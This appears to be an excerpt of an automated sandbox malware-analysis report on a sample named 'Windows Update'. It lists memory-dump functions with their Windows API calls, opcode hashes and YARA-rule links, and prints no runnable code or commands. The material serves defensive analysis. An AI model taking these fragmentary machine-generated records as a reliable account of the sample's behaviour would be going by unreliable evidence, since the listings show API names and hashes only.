                                                                                  • Instruction Fuzzy Hash: B901B171A00701CFEB10CF26DC857A6FB94EF00320F5880AAED09CB752D675E844CA61
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 006433A6, Relevance: 1.5, APIs: 1, Instructions: 47windowCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • FormatMessageW.KERNEL32(?,00000E40,?,?), ref: 006433F6
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.2110930139.0000000000640000.00000040.00000001.sdmp, Offset: 00640000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_640000_Windows Update.jbxd
                                                                                  Similarity
                                                                                  • API ID: FormatMessage
                                                                                  • String ID:
                                                                                  • API String ID: 1306739567-0
                                                                                  • Opcode ID: 0fdff9859625b80fb9e1fb078c51cb67cc9e82f06fc7f9b8c0e62a4c6e89f356
                                                                                  • Instruction ID: a3318d30bccb1287e36a6848c3edf88e99d6acfb08ef0e7eb6d5b89aa79703d3
                                                                                  • Opcode Fuzzy Hash: 0fdff9859625b80fb9e1fb078c51cb67cc9e82f06fc7f9b8c0e62a4c6e89f356
                                                                                  • Instruction Fuzzy Hash: 3D017171900600ABE310DF16DD86B66FBA8FB88A20F14816AED089B741D335B915CBE5
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 00644A46, Relevance: 1.5, APIs: 1, Instructions: 46windowCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.2110930139.0000000000640000.00000040.00000001.sdmp, Offset: 00640000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_640000_Windows Update.jbxd
                                                                                  Similarity
                                                                                  • API ID: Message
                                                                                  • String ID:
                                                                                  • API String ID: 2030045667-0
                                                                                  • Opcode ID: 47ffb0e645680534693350931d3841ec944d98a98d9ee83040b5382c9174132d
                                                                                  • Instruction ID: 3fa0580c01071ff8bad75664ceb293e60e282ac8c25ab9d58302e9b458e1a242
                                                                                  • Opcode Fuzzy Hash: 47ffb0e645680534693350931d3841ec944d98a98d9ee83040b5382c9174132d
                                                                                  • Instruction Fuzzy Hash: 7F019E71504740DFEB20DF15DC86B62FBE8EF14720F08809ADD498B31ADB71E884CA66
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 006419BA, Relevance: 1.5, APIs: 1, Instructions: 46libraryCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • LoadLibraryShim.MSCOREE(?,?,?,?), ref: 00641A05
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.2110930139.0000000000640000.00000040.00000001.sdmp, Offset: 00640000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_640000_Windows Update.jbxd
                                                                                  Similarity
                                                                                  • API ID: LibraryLoadShim
                                                                                  • String ID:
                                                                                  • API String ID: 1475914169-0
                                                                                  • Opcode ID: a2fe952bffa0b8f799cb638966c911857213f8f7185f983012d0696a56004502
                                                                                  • Instruction ID: 42e412bf337e3ce9c590b12f34ae297774f7d9925a7cafd0340810fe7dcbd403
                                                                                  • Opcode Fuzzy Hash: a2fe952bffa0b8f799cb638966c911857213f8f7185f983012d0696a56004502
                                                                                  • Instruction Fuzzy Hash: 7F018C725007409FEB20DF19D885BA6FBE9EB15720F088099ED498B752D371E884CA62
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 0011A5D6, Relevance: 1.5, APIs: 1, Instructions: 45COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • DuplicateHandle.KERNEL32(?,?,?,?,?,?,?), ref: 0011A61A
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.2110366565.000000000011A000.00000040.00000001.sdmp, Offset: 0011A000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_11a000_Windows Update.jbxd
                                                                                  Similarity
                                                                                  • API ID: DuplicateHandle
                                                                                  • String ID:
                                                                                  • API String ID: 3793708945-0
                                                                                  • Opcode ID: e73d9e45528d2a6d1b4e29065f8ff2d026cfe2c93398443239d00b9c3e36c0d1
                                                                                  • Instruction ID: ef1564a310001a2bf68ae3addd81ce1e8178aa0c6ac477bb8e4602b1fae79fff
                                                                                  • Opcode Fuzzy Hash: e73d9e45528d2a6d1b4e29065f8ff2d026cfe2c93398443239d00b9c3e36c0d1
                                                                                  • Instruction Fuzzy Hash: BC016972401700DFEB218F55DC84BA6FFE0EF18720F48C9AAEE494A612C376A454DB62
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 0064190E, Relevance: 1.5, APIs: 1, Instructions: 44COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.2110930139.0000000000640000.00000040.00000001.sdmp, Offset: 00640000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_640000_Windows Update.jbxd
                                                                                  Similarity
                                                                                  • API ID: Atom
                                                                                  • String ID:
                                                                                  • API String ID: 2154973765-0
                                                                                  • Opcode ID: 90e1383c3980536d38e98cd299e19458c0d4d9fc7bbf2df657f4d065e726d9a8
                                                                                  • Instruction ID: 429821f4f2d9c29f4f0cafff5ad8cf1e0c114f7e2e4aea6a95d07baf9a66abbc
                                                                                  • Opcode Fuzzy Hash: 90e1383c3980536d38e98cd299e19458c0d4d9fc7bbf2df657f4d065e726d9a8
                                                                                  • Instruction Fuzzy Hash: E7018F71504744DFEB10DF16DC857A6FBE4EF06721F0884AADD498F342D675E884CAA1
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 0011B7B2, Relevance: 1.5, APIs: 1, Instructions: 43registryCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • RegQueryValueExW.KERNEL32(?,00000E40,?,?), ref: 0011B802
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.2110366565.000000000011A000.00000040.00000001.sdmp, Offset: 0011A000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_11a000_Windows Update.jbxd
                                                                                  Similarity
                                                                                  • API ID: QueryValue
                                                                                  • String ID:
                                                                                  • API String ID: 3660427363-0
                                                                                  • Opcode ID: 9c961db09b35b674dde32d5f28522b14f061417f9a888227b43881465f1bd62b
                                                                                  • Instruction ID: 074c8f342fe9fa9dcad301585c1099955c9fce9a6b5ac2e5a36a1345b03bdfb6
                                                                                  • Opcode Fuzzy Hash: 9c961db09b35b674dde32d5f28522b14f061417f9a888227b43881465f1bd62b
                                                                                  • Instruction Fuzzy Hash: 8F016D71900601ABE320DF16DD86B26FBB8FB88B20F14825AED085B741D375F955CAE6
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 0011B952, Relevance: 1.5, APIs: 1, Instructions: 43COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • setsockopt.WS2_32(?,?,?,?,?), ref: 0011B990
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.2110366565.000000000011A000.00000040.00000001.sdmp, Offset: 0011A000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_11a000_Windows Update.jbxd
                                                                                  Similarity
                                                                                  • API ID: setsockopt
                                                                                  • String ID:
                                                                                  • API String ID: 3981526788-0
                                                                                  • Opcode ID: d0928545df0d29834a52cceff70f1b58bd949f9184d0ae2cbea53944a8dbe043
                                                                                  • Instruction ID: 10d0e95a47113865045d1f956e63450047f7816644e37d23dc75c60f39ecf39a
                                                                                  • Opcode Fuzzy Hash: d0928545df0d29834a52cceff70f1b58bd949f9184d0ae2cbea53944a8dbe043
                                                                                  • Instruction Fuzzy Hash: 7E01BC72404744DFEB21CF55DC84BA6FFA0EF14324F0888AADE498B612C376A458DB62
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 0011AD7A, Relevance: 1.5, APIs: 1, Instructions: 43threadCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • EnumThreadWindows.USER32(?,00000E40,?,?), ref: 0011ADC5
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.2110366565.000000000011A000.00000040.00000001.sdmp, Offset: 0011A000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_11a000_Windows Update.jbxd
                                                                                  Similarity
                                                                                  • API ID: EnumThreadWindows
                                                                                  • String ID:
                                                                                  • API String ID: 2941952884-0
                                                                                  • Opcode ID: 31bcedce303927967d5577a2f5ffb14a365f7a98628fe231a43bc33659a7a983
                                                                                  • Instruction ID: 74dc8a20898011162ec875b64284e29422c053b43c6573bc782291b0c19ab272
                                                                                  • Opcode Fuzzy Hash: 31bcedce303927967d5577a2f5ffb14a365f7a98628fe231a43bc33659a7a983
                                                                                  • Instruction Fuzzy Hash: AB01AD71900600ABE320DF16DC82B26FBB8FB88B20F14821AED084B741D231F915CBE6
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 006400F2, Relevance: 1.5, APIs: 1, Instructions: 43comclipboardCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • OleGetClipboard.OLE32(?,00000E40,?,?), ref: 00640142
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.2110930139.0000000000640000.00000040.00000001.sdmp, Offset: 00640000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_640000_Windows Update.jbxd
                                                                                  Similarity
                                                                                  • API ID: Clipboard
                                                                                  • String ID:
                                                                                  • API String ID: 220874293-0
                                                                                  • Opcode ID: 6131e156bbf4b99499f1c7c35e79da0bd0f528d20966dded6ac6d3bac500f2c2
                                                                                  • Instruction ID: ae37d4dfa986cd1a980b830396690e33b41dfd43fa637fbaedfbfee7d3eefa7d
                                                                                  • Opcode Fuzzy Hash: 6131e156bbf4b99499f1c7c35e79da0bd0f528d20966dded6ac6d3bac500f2c2
                                                                                  • Instruction Fuzzy Hash: 71016D71900601ABE320DF16DD86B26FBB8FB88A20F14825AED085B741D275F955CAE6
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 006416FE, Relevance: 1.5, APIs: 1, Instructions: 43COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • SHGetFolderPathW.SHELL32(?,00000E40,?,?), ref: 0064174E
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.2110930139.0000000000640000.00000040.00000001.sdmp, Offset: 00640000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_640000_Windows Update.jbxd
                                                                                  Similarity
                                                                                  • API ID: FolderPath
                                                                                  • String ID:
                                                                                  • API String ID: 1514166925-0
                                                                                  • Opcode ID: 9bf2d724b42395c7f0eb88591b17f01c2443859b29813f383986b0106ec18759
                                                                                  • Instruction ID: 53b7037195b393af46402f02edc1f409d735060f34afae974ebe1898324498b8
                                                                                  • Opcode Fuzzy Hash: 9bf2d724b42395c7f0eb88591b17f01c2443859b29813f383986b0106ec18759
                                                                                  • Instruction Fuzzy Hash: 88016D71900601ABE320DF16DD86F26FBB8FB88B20F14825AED085B741D275F955CAE6
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 00645CCE, Relevance: 1.5, APIs: 1, Instructions: 43windowCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • PeekMessageW.USER32(?,?,?,?,?), ref: 00645D0C
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.2110930139.0000000000640000.00000040.00000001.sdmp, Offset: 00640000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_640000_Windows Update.jbxd
                                                                                  Similarity
                                                                                  • API ID: MessagePeek
                                                                                  • String ID:
                                                                                  • API String ID: 2222842502-0
                                                                                  • Opcode ID: 74dc543aff352489f7917ebbe5acd136c576bcb92ce745dfe9b32a7d067b842a
                                                                                  • Instruction ID: b526677aa2523f93a25b056c5f507079e040012b0abe1f53d2604e2d362b0931
                                                                                  • Opcode Fuzzy Hash: 74dc543aff352489f7917ebbe5acd136c576bcb92ce745dfe9b32a7d067b842a
                                                                                  • Instruction Fuzzy Hash: 68017136500B00DFEB218F55DC89B66FFA1EF05720F08C4AADD464A652D371E859EB62
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 0064149E, Relevance: 1.5, APIs: 1, Instructions: 43fileCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • UnmapViewOfFile.KERNEL32(?,105056BB,00000000,?,?,?,?,?,?,?,?,73F33C58), ref: 006414D0
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.2110930139.0000000000640000.00000040.00000001.sdmp, Offset: 00640000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_640000_Windows Update.jbxd
                                                                                  Similarity
                                                                                  • API ID: FileUnmapView
                                                                                  • String ID:
                                                                                  • API String ID: 2564024751-0
                                                                                  • Opcode ID: 0c1256785646aa3ebe81f18c38279fcb31f648f5595edb9436a15bd4b2bb358e
                                                                                  • Instruction ID: f6438be8e7cfb0ecb09c4154476f745f718c7405c443906936f7c0761aa0c9d1
                                                                                  • Opcode Fuzzy Hash: 0c1256785646aa3ebe81f18c38279fcb31f648f5595edb9436a15bd4b2bb358e
                                                                                  • Instruction Fuzzy Hash: D101DF75500700CBEB10CF55DC85B96FFE4EF41321F18C4AADC0A8F642D671E848CA62
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 006413E2, Relevance: 1.5, APIs: 1, Instructions: 43fileCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.2110930139.0000000000640000.00000040.00000001.sdmp, Offset: 00640000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_640000_Windows Update.jbxd
                                                                                  Similarity
                                                                                  • API ID: FileView
                                                                                  • String ID:
                                                                                  • API String ID: 3314676101-0
                                                                                  • Opcode ID: ab8d9e99f7d481c995f76d3b6a9109645cda6bb6a326a24f3ebfd46330bb39f0
                                                                                  • Instruction ID: 0f58a608160f97bc82efd9318d1df137185842a746a4efd32b0dc2137d0ec70a
                                                                                  • Opcode Fuzzy Hash: ab8d9e99f7d481c995f76d3b6a9109645cda6bb6a326a24f3ebfd46330bb39f0
                                                                                  • Instruction Fuzzy Hash: 0E019E31400740DFEB20CF55DC84B96FFE1EF05320F0888AADE494A652C376A458DB62
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 00645C1A, Relevance: 1.5, APIs: 1, Instructions: 42windowCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.2110930139.0000000000640000.00000040.00000001.sdmp, Offset: 00640000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_640000_Windows Update.jbxd
                                                                                  Similarity
                                                                                  • API ID: MessagePost
                                                                                  • String ID:
                                                                                  • API String ID: 410705778-0
                                                                                  • Opcode ID: a83e729a92b5ecf95fad86267a0022524f96951b9d87dcd1bf7662abf08acc1e
                                                                                  • Instruction ID: 768fb259beb0fb54ee9a161da42709075860c2a7d9dcc2e341196885effa0121
                                                                                  • Opcode Fuzzy Hash: a83e729a92b5ecf95fad86267a0022524f96951b9d87dcd1bf7662abf08acc1e
                                                                                  • Instruction Fuzzy Hash: 16017135500B40DFEB208F15DC85B65FBA1EF15721F08849EDD4A4A652D271A854DBA2
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 00642BC6, Relevance: 1.5, APIs: 1, Instructions: 40COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.2110930139.0000000000640000.00000040.00000001.sdmp, Offset: 00640000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_640000_Windows Update.jbxd
                                                                                  Similarity
                                                                                  • API ID: ShowWindow
                                                                                  • String ID:
                                                                                  • API String ID: 1268545403-0
                                                                                  • Opcode ID: d6e55100268fc89a9fdf5090bd4ae747085211667b76e024c22f2cc522a1af81
                                                                                  • Instruction ID: d2a938fab4fab6922ed73b6556b7f4a4c430c20abfe379e9c8ee41325321092f
                                                                                  • Opcode Fuzzy Hash: d6e55100268fc89a9fdf5090bd4ae747085211667b76e024c22f2cc522a1af81
                                                                                  • Instruction Fuzzy Hash: 3A01D176500740CFEB608F15EC85BA6FBA4EF05720F18C0AAED498B752C671E848DB62
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 00645B7A, Relevance: 1.5, APIs: 1, Instructions: 39COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • KiUserCallbackDispatcher.NTDLL(?,105056BB,00000000,?,?,?,?,?,?,?,?,73F33C58), ref: 00645BAC
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.2110930139.0000000000640000.00000040.00000001.sdmp, Offset: 00640000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_640000_Windows Update.jbxd
                                                                                  Similarity
                                                                                  • API ID: CallbackDispatcherUser
                                                                                  • String ID:
                                                                                  • API String ID: 2492992576-0
                                                                                  • Opcode ID: 54c70e46a6b5a37458dc5b8c823934082db7616d35f609909dab2993c1d21743
                                                                                  • Instruction ID: 923211996cb19608f8c990c51e4883e351caba37db315205d3ba8971c35cfe58
                                                                                  • Opcode Fuzzy Hash: 54c70e46a6b5a37458dc5b8c823934082db7616d35f609909dab2993c1d21743
                                                                                  • Instruction Fuzzy Hash: 4601F435500B00CFEB10CF15DC85B92FBA0EF00720F18C0AADD0A8B752C275E848DB62
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 00642D02, Relevance: 1.5, APIs: 1, Instructions: 39COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • FindClose.KERNEL32(?,105056BB,00000000,?,?,?,?,?,?,?,?,73F33C58), ref: 00642D34
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.2110930139.0000000000640000.00000040.00000001.sdmp, Offset: 00640000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_640000_Windows Update.jbxd
                                                                                  Similarity
                                                                                  • API ID: CloseFind
                                                                                  • String ID:
                                                                                  • API String ID: 1863332320-0
                                                                                  • Opcode ID: 45e90551d46e11f9ceb64bf1d4f40a77a523007b3196ee9f2d5a536cf26d57bb
                                                                                  • Instruction ID: 3755c5efc65d557d260d8d80c8441057123d0ade121a8b8b1ff288ee822821e3
                                                                                  • Opcode Fuzzy Hash: 45e90551d46e11f9ceb64bf1d4f40a77a523007b3196ee9f2d5a536cf26d57bb
                                                                                  • Instruction Fuzzy Hash: 0E012835900745DFEB208F15DC857A6FF90EF00721F58C0AAED098B752D275E844DA62
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 0011A3A6, Relevance: 1.5, APIs: 1, Instructions: 38COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • GetForegroundWindow.USER32 ref: 0011A3D5
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.2110366565.000000000011A000.00000040.00000001.sdmp, Offset: 0011A000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_11a000_Windows Update.jbxd
                                                                                  Similarity
                                                                                  • API ID: ForegroundWindow
                                                                                  • String ID:
                                                                                  • API String ID: 2020703349-0
                                                                                  • Opcode ID: 85fc1c13d6f88789674069d2c79231606a7fb3a673e78019f27a4370098fae9c
                                                                                  • Instruction ID: f6fe04325864551d9bb1f3f4400a83dbb7aed020423d4bf630ebb5198b8d4385
                                                                                  • Opcode Fuzzy Hash: 85fc1c13d6f88789674069d2c79231606a7fb3a673e78019f27a4370098fae9c
                                                                                  • Instruction Fuzzy Hash: DC01AD31401740CFEB10DF15D9897A1FF94EF00220F48C0AADD098B646D3B5A884CAA3
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 0064278A, Relevance: 1.5, APIs: 1, Instructions: 38windowCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • SendMessageW.USER32(?,?,?,?), ref: 006427C5
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.2110930139.0000000000640000.00000040.00000001.sdmp, Offset: 00640000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_640000_Windows Update.jbxd
                                                                                  Similarity
                                                                                  • API ID: MessageSend
                                                                                  • String ID:
                                                                                  • API String ID: 3850602802-0
                                                                                  • Opcode ID: 68ab2d8505d989e565964e676c8ca67e6c1dc88db6ba2bbaca6143c134d48666
                                                                                  • Instruction ID: 212a317830c196e0ba31ac7cc7395178926cefb2054384e5320b8733b8587bad
                                                                                  • Opcode Fuzzy Hash: 68ab2d8505d989e565964e676c8ca67e6c1dc88db6ba2bbaca6143c134d48666
                                                                                  • Instruction Fuzzy Hash: C701AD35400740DFEB208F05DC84B66FFA1EF14720F58C49AED490B622C372A858DB62
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 006426EA, Relevance: 1.5, APIs: 1, Instructions: 36COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • GetWindowPlacement.USER32(?,?), ref: 0064271F
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.2110930139.0000000000640000.00000040.00000001.sdmp, Offset: 00640000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_640000_Windows Update.jbxd
                                                                                  Similarity
                                                                                  • API ID: PlacementWindow
                                                                                  • String ID:
                                                                                  • API String ID: 2154376794-0
                                                                                  • Opcode ID: 49c2f1678fafeff18835095e0aabe4cd347224dfed8e27f24ebd052faeb20b6a
                                                                                  • Instruction ID: aa26370bdddaa0099b49ed7eb647fe2e0320628eaf0d6b8649e0572d8a42c93e
                                                                                  • Opcode Fuzzy Hash: 49c2f1678fafeff18835095e0aabe4cd347224dfed8e27f24ebd052faeb20b6a
                                                                                  • Instruction Fuzzy Hash: A6018C35500740DFEB20CF05D889BA1FFA0EF14725F58C0AAED494B766C275A848DA62
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 0011A69A, Relevance: 1.5, APIs: 1, Instructions: 35COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • SetErrorMode.KERNEL32(?,105056BB,00000000,?,?,?,?,?,?,?,?,73F33C58), ref: 0011A6CC
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.2110366565.000000000011A000.00000040.00000001.sdmp, Offset: 0011A000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_11a000_Windows Update.jbxd
                                                                                  Similarity
                                                                                  • API ID: ErrorMode
                                                                                  • String ID:
                                                                                  • API String ID: 2340568224-0
                                                                                  • Opcode ID: 4add353404d9514d7098b2da2352d63add06ed5e829628d3f0d04edd87acbaee
                                                                                  • Instruction ID: 77a2a6a7d1ebf96715d82dc93e30c851c14472bfad2f64b62c3ee8e9c1a54a8f
                                                                                  • Opcode Fuzzy Hash: 4add353404d9514d7098b2da2352d63add06ed5e829628d3f0d04edd87acbaee
                                                                                  • Instruction Fuzzy Hash: 6EF0C235501740DFEB20DF05D8897A5FFA0EF04721F88C0AADD494B316D375A884DAA3
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 004E797A, Relevance: 1.5, APIs: 1, Instructions: 34COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • KiUserCallbackDispatcher.NTDLL ref: 004E79B4
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.2110798495.00000000004E0000.00000040.00000001.sdmp, Offset: 004E0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_4e0000_Windows Update.jbxd
                                                                                  Similarity
                                                                                  • API ID: CallbackDispatcherUser
                                                                                  • String ID:
                                                                                  • API String ID: 2492992576-0
                                                                                  • Opcode ID: 1a5eb5e5057990be996c361e12ce6922b824d13131ae618b16cfb3a44bf5ee98
                                                                                  • Instruction ID: 3236b3f8147968f4a0e0fe55025b65bcfa63cec194da6e957f3ac6f88eeeff94
                                                                                  • Opcode Fuzzy Hash: 1a5eb5e5057990be996c361e12ce6922b824d13131ae618b16cfb3a44bf5ee98
                                                                                  • Instruction Fuzzy Hash: 01F09074E09288DFDB01DFB4C5545AEBFB0EF16310F1045DAC855A3352D7358A54CB91
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 004E7988, Relevance: 1.5, APIs: 1, Instructions: 26COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • KiUserCallbackDispatcher.NTDLL ref: 004E79B4
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.2110798495.00000000004E0000.00000040.00000001.sdmp, Offset: 004E0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_4e0000_Windows Update.jbxd
                                                                                  Similarity
                                                                                  • API ID: CallbackDispatcherUser
                                                                                  • String ID:
                                                                                  • API String ID: 2492992576-0
                                                                                  • Opcode ID: 6c53b1085803f09235cf7aad8805781a7a376e64725913d1b737fb0bb987df39
                                                                                  • Instruction ID: 0ca38696935876d108da5718fd99a2cf03888ac5fafad31c8ae1dd80028facca
                                                                                  • Opcode Fuzzy Hash: 6c53b1085803f09235cf7aad8805781a7a376e64725913d1b737fb0bb987df39
                                                                                  • Instruction Fuzzy Hash: FBF01578D01208EFDB04EFA8C944AAEBBB1EF46300F1050AAD81463351DB319E50CB81
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 001AA954, Relevance: 1.3, Strings: 1, Instructions: 90COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.2110422187.00000000001A2000.00000040.00000001.sdmp, Offset: 001A2000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_1a2000_Windows Update.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: VnRh
                                                                                  • API String ID: 0-1183825908
                                                                                  • Opcode ID: 7ed7d0f70fe83716e6c394ca365cad1ed8c658371360c86ead4bc82f4518fbe8
                                                                                  • Instruction ID: 304b0cfd674c3fcf7eb6368f0cc329c38369ac34ede9fd0135e712c9205c1ea9
                                                                                  • Opcode Fuzzy Hash: 7ed7d0f70fe83716e6c394ca365cad1ed8c658371360c86ead4bc82f4518fbe8
                                                                                  • Instruction Fuzzy Hash: 573171B6509340AFD710CF05DC41A57FFE4EB85660F04C96EFD899B352D276A904CBA2
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 001AA812, Relevance: 1.3, Strings: 1, Instructions: 88COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.2110422187.00000000001A2000.00000040.00000001.sdmp, Offset: 001A2000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_1a2000_Windows Update.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: VnRh
                                                                                  • API String ID: 0-1183825908
                                                                                  • Opcode ID: 441f0850cffecb9927f74096c974f184484baaaf6c88113ae88260458c527ddd
                                                                                  • Instruction ID: b0a3c1968db59326e0a356ae633c4abbb6fba776fcb334bcbb2dee4580e78845
                                                                                  • Opcode Fuzzy Hash: 441f0850cffecb9927f74096c974f184484baaaf6c88113ae88260458c527ddd
                                                                                  • Instruction Fuzzy Hash: B1318FB6508340AFD310CF45DC41A57FFE8EB89660F04886EFD9897212D271A904CBA2
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 00642F3E, Relevance: 1.3, APIs: 1, Instructions: 73memoryCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.2110930139.0000000000640000.00000040.00000001.sdmp, Offset: 00640000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_640000_Windows Update.jbxd
                                                                                  Similarity
                                                                                  • API ID: AllocLocal
                                                                                  • String ID:
                                                                                  • API String ID: 3494564517-0
                                                                                  • Opcode ID: 28a68cdfa7dd8178d1a456d68c45839ca7a13247e4b73e58f9a3c4cf570bf764
                                                                                  • Instruction ID: 3fec904a649cb56d1eceece690caf613ae4c0a623416319941b482a4864925b1
